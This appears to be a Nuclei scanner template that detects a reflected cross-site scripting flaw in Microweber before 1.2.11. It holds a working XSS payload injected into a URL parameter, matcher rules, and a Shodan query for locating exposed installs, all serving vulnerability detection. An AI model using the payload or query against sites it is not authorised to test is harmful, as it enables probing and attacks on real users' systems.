35 lines
864 B
YAML
35 lines
864 B
YAML
id: microweber-xss
|
|
|
|
info:
|
|
name: Microweber XSS
|
|
author: gy741
|
|
severity: medium
|
|
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
|
|
reference:
|
|
- https://github.com/microweber/microweber/issues/809
|
|
- https://github.com/microweber/microweber
|
|
metadata:
|
|
shodan-query: 'http.favicon.hash:780351152'
|
|
tags: microweber,xss,oss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>¶ms=filetype=images#path='
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>" 0="filetype=images"'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|